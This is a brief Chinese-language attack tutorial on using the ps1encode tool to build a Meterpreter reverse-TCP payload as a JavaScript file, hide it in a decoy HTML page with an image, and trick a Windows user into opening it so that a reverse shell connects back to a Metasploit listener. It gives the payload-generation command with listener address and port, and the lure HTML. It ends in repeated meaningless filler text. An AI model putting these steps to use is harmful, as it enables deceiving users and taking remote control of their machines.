项目地址:https://github.com/CroweCybersecurity/ps1encode
适用场景:目标主机Windows系列

1、下载ps1encode:

2、生成载荷
./ps1encode.rb --LHOST 192.168.67.128 --LPORT 4444 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js >> shell.js
3、使用Msf进行本地监听

4、创建隐蔽的html文件以及图片文件进行迷惑用户,在html文件中引用恶意的JS文件:

<html>
<title>SimpleTest</title>
<body>
<img src='1.png'>
<script src='shell.js'></script>
</body>
</html>5、之后将恶意文件发送给用户诱导用户访问hello.html:

6、之后成功反弹shell回来

凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字凑数字